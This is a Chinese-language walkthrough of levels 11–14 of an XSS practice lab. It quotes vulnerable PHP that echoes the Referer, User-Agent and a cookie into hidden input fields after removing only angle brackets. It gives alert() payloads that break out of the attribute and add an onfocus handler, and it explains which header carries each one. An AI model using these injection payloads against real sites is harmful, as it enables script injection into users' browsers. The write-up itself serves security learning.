level11:
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
?t_ref=" οnfοcus=javascript:alert() type="text'
οnfοcus=javascript:alert() type="text ' "
但是t_ref参数接收的是HTTP_REFERER请求头,所以这道题应该是在这里存在漏洞点
但是要注意的是大于号是被删除了
尝试抓包
如果在url提交,那么抓包也抓不到数据
所以真正的做法是:因为t_ref直接接收refer,所以直接构造referer
" οnfοcus=javascript:alert() type="text把这个填在referer里即可
level12:
<input name="t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" type="hidden">
发现这一行很特殊的代码
value里的是UA头
所以我猜测注入点是UA头
直接用hackbar提交ua即可
" οnfοcus=javascript:alert() type="text
level13:
<input name="t_cook" value="call me maybe?" type="hidden">
这一行特殊的代码。value的值为call me maybe?
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
查看了一下源代码,发现接收的是用户的cookie
而且大于号是被删掉了,但是可以使用伪协议
user=" οnfοcus=javascript:alert() type="text
level14:
在点击a标签后再url中发现src参数
但是没啥用
然后f12查看源代码发现代码很少,感觉只有这个有用
<iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe>
但是为啥这个网站打不开,反正感觉是跳转到这个网站然后再xss